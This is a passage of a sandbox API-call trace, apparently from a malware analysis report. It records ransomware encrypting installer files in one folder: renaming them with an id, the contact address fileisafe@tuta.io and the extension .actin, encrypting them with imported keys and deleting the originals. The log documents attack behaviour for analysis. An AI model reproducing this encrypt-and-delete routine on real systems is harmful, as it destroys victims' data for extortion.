(lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0050.267] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0050.267] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0050.267] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0050.267] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0050.267] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71d40) returned 1 [0050.267] CryptSetKeyParam (hKey=0xf71d40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0050.267] ReadFile (in: hFile=0x340, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x110100, lpOverlapped=0x0) returned 1 [0050.286] CryptEncrypt (in: hKey=0xf71d40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x110100, dwBufLen=0x110100 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x110100) returned 1 [0050.287] WriteFile (in: hFile=0x334, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x110100, lpOverlapped=0x0) returned 1 [0050.898] ReadFile (in: hFile=0x340, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0xbf00, lpOverlapped=0x0) returned 1 [0050.899] CryptEncrypt (in: hKey=0xf71d40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xbf10, dwBufLen=0xbf10 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xbf10) returned 1 [0050.899] WriteFile (in: hFile=0x334, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xbf10, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xbf10, lpOverlapped=0x0) returned 1 [0050.900] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71bc0) returned 1 [0050.900] CryptSetKeyParam (hKey=0xf71bc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0050.900] CryptEncrypt (in: hKey=0xf71bc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0050.900] CryptDestroyKey (hKey=0xf71bc0) returned 1 [0050.900] WriteFile (in: hFile=0x334, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0050.900] CryptDestroyKey (hKey=0xf71d40) returned 1 [0050.900] CloseHandle (hObject=0x340) returned 1 [0050.900] CloseHandle (hObject=0x334) returned 1 [0050.992] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi")) returned 1 [0050.994] SetEvent (hEvent=0x2e8) returned 1 [0050.994] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0050.994] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0050.994] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=43131591) returned 1 [0050.994] CloseHandle (hObject=0x334) returned 1 [0050.995] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz")) returned 0x20 [0050.995] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0050.995] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0050.995] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa38 | out: lpNewFilePointer=0x0) returned 1 [0050.995] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa38 | out: lpNewFilePointer=0x0) returned 1 [0050.995] ReadFile (in: hFile=0x334, lpBuffer=0x3e5c058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38efa44, lpOverlapped=0x0 | out: lpBuffer=0x3e5c058*, lpNumberOfBytesRead=0x38efa44*=0x40000, lpOverlapped=0x0) returned 1 [0050.999] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0xdb60ed, lpNewFilePointer=0x0, dwMoveMethod=0x38efa38 | out: lpNewFilePointer=0x0) returned 1 [0050.999] ReadFile (in: hFile=0x334, lpBuffer=0x3e9c058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38efa44, lpOverlapped=0x0 | out: lpBuffer=0x3e9c058*, lpNumberOfBytesRead=0x38efa44*=0x40000, lpOverlapped=0x0) returned 1 [0051.318] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x28e22c7, lpNewFilePointer=0x0, dwMoveMethod=0x38efa38 | out: lpNewFilePointer=0x0) returned 1 [0051.318] ReadFile (in: hFile=0x334, lpBuffer=0x3edc058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38efa44, lpOverlapped=0x0 | out: lpBuffer=0x3edc058*, lpNumberOfBytesRead=0x38efa44*=0x40000, lpOverlapped=0x0) returned 1 [0051.326] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa94 | out: phKey=0x38efa94*=0xf720c0) returned 1 [0051.326] CryptSetKeyParam (hKey=0xf720c0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0051.326] CryptEncrypt (in: hKey=0xf720c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa48*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa48*=0xc0060) returned 1 [0051.327] CryptDestroyKey (hKey=0xf720c0) returned 1 [0051.327] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa70 | out: lpNewFilePointer=0x0) returned 1 [0051.327] WriteFile (in: hFile=0x334, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x38efa80, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa80*=0xc0112, lpOverlapped=0x0) returned 1 [0051.793] SetEndOfFile (hFile=0x334) returned 1 [0051.793] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x28e22c7, lpNewFilePointer=0x0, dwMoveMethod=0x38efa40 | out: lpNewFilePointer=0x0) returned 1 [0051.793] WriteFile (in: hFile=0x334, lpBuffer=0x3f1c14a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38efa4c, lpOverlapped=0x0 | out: lpBuffer=0x3f1c14a*, lpNumberOfBytesWritten=0x38efa4c*=0x40000, lpOverlapped=0x0) returned 1 [0051.795] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0xdb60ed, lpNewFilePointer=0x0, dwMoveMethod=0x38efa40 | out: lpNewFilePointer=0x0) returned 1 [0051.795] WriteFile (in: hFile=0x334, lpBuffer=0x3f1c14a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38efa4c, lpOverlapped=0x0 | out: lpBuffer=0x3f1c14a*, lpNumberOfBytesWritten=0x38efa4c*=0x40000, lpOverlapped=0x0) returned 1 [0051.796] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa40 | out: lpNewFilePointer=0x0) returned 1 [0051.796] WriteFile (in: hFile=0x334, lpBuffer=0x3f1c14a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38efa4c, lpOverlapped=0x0 | out: lpBuffer=0x3f1c14a*, lpNumberOfBytesWritten=0x38efa4c*=0x40000, lpOverlapped=0x0) returned 1 [0051.796] CloseHandle (hObject=0x334) returned 1 [0056.197] SetEvent (hEvent=0x2e8) returned 1 [0056.197] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0056.197] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.dll" (normalized: "c:\\588bce7c90097ed212\\setupui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0056.198] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=295248) returned 1 [0056.198] CloseHandle (hObject=0x330) returned 1 [0056.198] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.dll" (normalized: "c:\\588bce7c90097ed212\\setupui.dll")) returned 0x80 [0056.198] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\setupui.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0056.198] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.dll" (normalized: "c:\\588bce7c90097ed212\\setupui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0056.198] SetFilePointerEx (in: hFile=0x330, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0056.198] SetFilePointerEx (in: hFile=0x330, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0056.198] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\setupui.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0056.199] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71c40) returned 1 [0056.199] CryptSetKeyParam (hKey=0xf71c40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0056.199] ReadFile (in: hFile=0x330, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x48150, lpOverlapped=0x0) returned 1 [0056.203] CryptEncrypt (in: hKey=0xf71c40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x48160, dwBufLen=0x48160 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x48160) returned 1 [0056.204] WriteFile (in: hFile=0x328, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x48160, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x48160, lpOverlapped=0x0) returned 1 [0056.211] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71d00) returned 1 [0056.211] CryptSetKeyParam (hKey=0xf71d00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0056.211] CryptEncrypt (in: hKey=0xf71d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40, dwBufLen=0x40 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40) returned 1 [0056.211] CryptDestroyKey (hKey=0xf71d00) returned 1 [0056.211] WriteFile (in: hFile=0x328, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf2, lpOverlapped=0x0) returned 1 [0056.211] CryptDestroyKey (hKey=0xf71c40) returned 1 [0056.211] CloseHandle (hObject=0x330) returned 1 [0056.211] CloseHandle (hObject=0x328) returned 1 [0056.217] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.dll" (normalized: "c:\\588bce7c90097ed212\\setupui.dll")) returned 1 [0056.220] SetEvent (hEvent=0x2e8) returned 1 [0056.220] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0056.220] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0056.220] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=30120) returned 1 [0056.220] CloseHandle (hObject=0x328) returned 1 [0056.221] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd")) returned 0x80 [0056.221] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0056.221] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0056.221] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0056.221] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0056.221] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0056.221] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71d00) returned 1 [0056.221] CryptSetKeyParam (hKey=0xf71d00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0056.221] ReadFile (in: hFile=0x328, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x75a8, lpOverlapped=0x0) returned 1 [0056.223] CryptEncrypt (in: hKey=0xf71d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x75b0, dwBufLen=0x75b0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x75b0) returned 1 [0056.223] WriteFile (in: hFile=0x330, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x75b0, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x75b0, lpOverlapped=0x0) returned 1 [0056.224] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf720c0) returned 1 [0056.224] CryptSetKeyParam (hKey=0xf720c0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0056.224] CryptEncrypt (in: hKey=0xf720c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40, dwBufLen=0x40 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40) returned 1 [0056.224] CryptDestroyKey (hKey=0xf720c0) returned 1 [0056.224] WriteFile (in: hFile=0x330, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf2, lpOverlapped=0x0) returned 1 [0056.224] CryptDestroyKey (hKey=0xf71d00) returned 1 [0056.224] CloseHandle (hObject=0x328) returned 1 [0056.225] CloseHandle (hObject=0x330) returned 1 [0056.226] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd")) returned 1 [0056.227] SetEvent (hEvent=0x2e8) returned 1 [0056.227] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0056.227] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUtility.exe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0056.227] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=96088) returned 1 [0056.227] CloseHandle (hObject=0x330) returned 1 [0056.227] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUtility.exe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe")) returned 0x80 [0056.227] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUtility.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0056.228] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUtility.exe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0056.228] SetFilePointerEx (in: hFile=0x330, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0056.228] SetFilePointerEx (in: hFile=0x330, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0056.228] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUtility.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0056.228] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71c80) returned 1 [0056.228] CryptSetKeyParam (hKey=0xf71c80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0056.228] ReadFile (in: hFile=0x330, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x17758, lpOverlapped=0x0) returned 1 [0056.230] CryptEncrypt (in: hKey=0xf71c80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x17760, dwBufLen=0x17760 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x17760) returned 1 [0056.230] WriteFile (in: hFile=0x328, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x17760, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x17760, lpOverlapped=0x0) returned 1 [0056.232] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71a00) returned 1 [0056.232] CryptSetKeyParam (hKey=0xf71a00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0056.232] CryptEncrypt (in: hKey=0xf71a00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0056.232] CryptDestroyKey (hKey=0xf71a00) returned 1 [0056.232] WriteFile (in: hFile=0x328, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0056.232] CryptDestroyKey (hKey=0xf71c80) returned 1 [0056.233] CloseHandle (hObject=0x330) returned 1 [0056.233] CloseHandle (hObject=0x328) returned 1 [0056.235] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUtility.exe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe")) returned 1 [0056.236] SetEvent (hEvent=0x2e8) returned 1 [0056.236] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0056.236] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0056.236] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=41080) returned 1 [0056.236] CloseHandle (hObject=0x328) returned 1 [0056.237] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp")) returned 0x80 [0056.237] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0056.237] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0056.237] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0056.237] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0056.237] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0056.237] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71c40) returned 1 [0056.237] CryptSetKeyParam (hKey=0xf71c40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0056.237] ReadFile (in: hFile=0x328, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0xa078, lpOverlapped=0x0) returned 1 [0056.564] CryptEncrypt (in: hKey=0xf71c40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xa080, dwBufLen=0xa080 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xa080) returned 1 [0056.580] WriteFile (in: hFile=0x330, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xa080, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xa080, lpOverlapped=0x0) returned 1 [0056.581] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf72080) returned 1 [0056.581] CryptSetKeyParam (hKey=0xf72080, dwParam=0x1, 